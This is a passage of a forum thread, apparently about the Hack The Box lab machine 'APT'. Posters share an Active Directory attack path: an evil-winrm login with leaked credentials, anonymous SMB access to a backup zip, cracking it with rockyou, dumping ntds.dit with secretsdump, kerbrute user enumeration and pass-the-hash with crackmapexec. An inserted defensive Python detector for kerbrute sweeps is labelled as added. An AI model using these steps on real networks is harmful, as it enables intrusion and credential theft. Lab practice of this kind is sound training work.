TUTORIAL apt.htb
by ARhOmOuTEd - November 02, 2020 at 04:46 PM
#25
(November 20, 2020 at 02:37 PM)Predxtor Wrote:
(November 20, 2020 at 10:22 AM)CyberBandit Wrote:
(November 16, 2020 at 06:13 AM)Predxtor Wrote:
(November 15, 2020 at 07:11 PM)raidmail2020 Wrote:
(November 15, 2020 at 06:34 PM)Predxtor Wrote: here's user lol



evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p 'G1#[email protected]'



Great! Thanks!



Could you please explain how you found 'henry.vinson_adm' and 'G1#[email protected]' ?



1) get IPV6

2) smbclient connect to it and get backup.zip

3) crack zip with rockyou.txt

4) run secretsdump.py (impacket) on ntds.dit

5) run kerbrute to find valid users

6) make a list of hashes

7) use crackmapexec -H hashes.txt

@Predxtor thanks for posting these steps, do you mind sharing the kerbrute command used to enum users, I've used the following,

kerbrute_linux_amd64 userenum --dc apt.htb.local -d htb.local usernames.txt however only found (administrator,apt & henry.vinsom).

struggling to find the connection between aine.stafford & henry.vinson (or henry.vinson.adm)

Thanks.

when you get the henry.vinson user, make a list of hashes you got and use crackmapexec, then you can find the creds

use --users, I found the _adm user, but I can't find the password.
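Added example, not from this thread: the defender's view of step 5 in the list above. A kerbrute-style userenum sweep asks the KDC for a TGT for every candidate name, and each name that does not exist is logged on the domain controller as event 4768 with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), so many distinct 0x6 failures from one client address inside a short window stand out. The event records below are constructed, simplified tuples (a real export would come from the Security log or a SIEM), and the threshold and window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Result code in event 4768 meaning the requested client principal does not
# exist in the domain (KDC_ERR_C_PRINCIPAL_UNKNOWN).
PRINCIPAL_UNKNOWN = "0x6"

# Constructed sample 4768 records: (timestamp, client address, account, result code).
# 10.10.14.9 is normal traffic with one typo; 10.10.14.5 is a wordlist sweep.
SWEEP_NAMES = ["jdoe", "ksmith", "mbrown", "pwilson", "rjones", "sgarcia",
               "tmiller", "wdavis", "xlee", "ylopez", "zhall", "qnguyen"]
SAMPLE_EVENTS = [
    ("2020-11-15T18:29:50", "10.10.14.9", "henry.vinson", "0x0"),
    ("2020-11-15T18:29:55", "10.10.14.9", "henry.vinsn", "0x6"),
] + [
    ("2020-11-15T18:30:%02d" % i, "10.10.14.5", name, "0x6")
    for i, name in enumerate(SWEEP_NAMES)
]


def find_enum_sweeps(events, threshold=10, window=timedelta(minutes=5)):
    """Return {client_ip: set of unknown names} for every client that produced
    at least `threshold` distinct unknown-principal failures inside `window`.
    Threshold and window are assumed tuning values, not vendor defaults."""
    failures = defaultdict(list)  # client ip -> [(timestamp, account)]
    for ts, ip, account, code in events:
        if code.lower() == PRINCIPAL_UNKNOWN:
            failures[ip].append((datetime.fromisoformat(ts), account.lower()))

    flagged = {}
    for ip, items in failures.items():
        items.sort()
        start = 0
        for end in range(len(items)):
            # Slide the window start forward until the span is at most `window`.
            while items[end][0] - items[start][0] > window:
                start += 1
            distinct = {name for _, name in items[start:end + 1]}
            if len(distinct) >= threshold:
                flagged[ip] = {name for _, name in items}
                break
    return flagged


if __name__ == "__main__":
    for ip, names in find_enum_sweeps(SAMPLE_EVENTS).items():
        print(f"{ip}: {len(names)} unknown principals tried, e.g. {sorted(names)[:3]}")
```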
#26
(November 16, 2020 at 06:13 AM)Predxtor Wrote:
(November 15, 2020 at 07:11 PM)raidmail2020 Wrote:
(November 15, 2020 at 06:34 PM)Predxtor Wrote: here's user lol

evil-winrm -i dead:beef::b885:d62a:d679:573f -u henry.vinson_adm -p 'G1#[email protected]'

Great! Thanks!

Could you please explain how you found 'henry.vinson_adm' and 'G1#[email protected]' ?

1) get IPV6
2) smbclient connect to it and get backup.zip
3) crack zip with rockyou.txt
4) run secretsdump.py (impacket) on ntds.dit
5) run kerbrute to find valid users
6) make a list of hashes
7) use crackmapexec -H hashes.txt

How did you find the IPv6 address?
#27
@runos

This is how

https://airbus-cyber-security.com/the-ox...ntication/
#28
(November 30, 2020 at 08:13 PM)chernakotka Wrote: @runos

This is how

https://airbus-cyber-security.com/the-ox...ntication/

Thanks. It says this "Only Windows machines with the version 5.6 of DCOM Remote Protocol can be abused. This version occurred in June 2008."

But it also says "Please see below results in Figure 6 of the tool when targeting a Windows 10 Pro version 1909:"

So this technique works on all Windows machines basically?
#29
crackmapexec seems to have problems with IPV6?

crackmapexec --verbose smb box.htb -u henry.vinson -H 2de80758521541d19cabba480b260e8f -d htb.local

Error: Error resolving hostname box.htb: [Errno -2] Name or service not known

AND yes, box.htb resolving to the IPv6 address

doesn't really work. Any suggestions?

thanks for every helpful answer.
#30
I don't know, but nice...
#31
(December 01, 2020 at 08:46 AM)shiggy100 Wrote: crackmapexec seems to have problems with IPV6?

crackmapexec --verbose smb box.htb -u henry.vinson -H 2de80758521541d19cabba480b260e8f -d htb.local

Error: Error resolving hostname box.htb: [Errno -2] Name or service not known

AND yes, box.htb resolving to the IPv6 address

doesn't really work. Any suggestions?

thanks for every helpful answer.

Did you figure out how to download the files from backup? I can list the SMB shares with smbclient, but I can't find the correct command to download the files from the backup share.
#32
(November 30, 2020 at 09:24 PM)runos Wrote:
(November 30, 2020 at 08:13 PM)chernakotka Wrote: @runos

This is how

https://airbus-cyber-security.com/the-ox...ntication/

Thanks. It says this "Only Windows machines with the version 5.6 of DCOM Remote Protocol can be abused. This version occurred in June 2008."

But it also says "Please see below results in Figure 6 of the tool when targeting a Windows 10 Pro version 1909:"

So this technique works on all Windows machines basically?

I meant to use the script that is in the article. It will help you find the IPv6 address.

(December 01, 2020 at 09:49 AM)runos Wrote:
(December 01, 2020 at 08:46 AM)shiggy100 Wrote: crackmapexec seems to have problems with IPV6?

crackmapexec --verbose smb box.htb -u henry.vinson -H 2de80758521541d19cabba480b260e8f -d htb.local

Error: Error resolving hostname box.htb: [Errno -2] Name or service not known

AND yes, box.htb resolving to the IPv6 address

doesn't really work. Any suggestions?

thanks for every helpful answer.

Did you figure out how to download the files from backup? I can list the SMB shares with smbclient, but I can't find the correct command to download the files from the backup share.

Just use smbclient

smbclient //apt.htb/backup -U""
#33
(December 01, 2020 at 10:27 AM)chernakotka Wrote:
(November 30, 2020 at 09:24 PM)runos Wrote:
(November 30, 2020 at 08:13 PM)chernakotka Wrote: @runos

This is how

https://airbus-cyber-security.com/the-ox...ntication/

Thanks. It says this "Only Windows machines with the version 5.6 of DCOM Remote Protocol can be abused. This version occurred in June 2008."

But it also says "Please see below results in Figure 6 of the tool when targeting a Windows 10 Pro version 1909:"

So this technique works on all Windows machines basically?

I meant to use the script that is in the article. It will help you find the IPv6 address.

(December 01, 2020 at 09:49 AM)runos Wrote:
(December 01, 2020 at 08:46 AM)shiggy100 Wrote: crackmapexec seems to have problems with IPV6?

crackmapexec --verbose smb box.htb -u henry.vinson -H 2de80758521541d19cabba480b260e8f -d htb.local

Error: Error resolving hostname box.htb: [Errno -2] Name or service not known

AND yes, box.htb resolving to the IPv6 address

doesn't really work. Any suggestions?

thanks for every helpful answer.

Did you figure out how to download the files from backup? I can list the SMB shares with smbclient, but I can't find the correct command to download the files from the backup share.

Just use smbclient

smbclient //apt.htb/backup -U""

Smart... I forgot to think of /etc/hosts. Now I am trying to brute-force the usernames with userenum to see which ones are valid. Do I need to change the usernames from the format firstname.lastname to flastname, so that the first letter is the first letter of the first name followed by the last name, like it usually is in AD environments?
#34
How would you use evil-winrm if the ports 5985/5986 are closed?

I must be missing something :)
#35
(December 01, 2020 at 01:08 PM)bodiesplus Wrote: How would you use evil-winrm if the ports 5985/5986 are closed?

I must be missing something :)

Run nmap against ipv6 ;)
#36
I did it..

Discovered open port 445/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 135/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 53/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 80/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 593/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 636/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 389/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 88/tcp on dead:beef::b885:d62a:d679:573f
Discovered open port 464/tcp on dead:beef::b885:d62a:d679:573f

:)
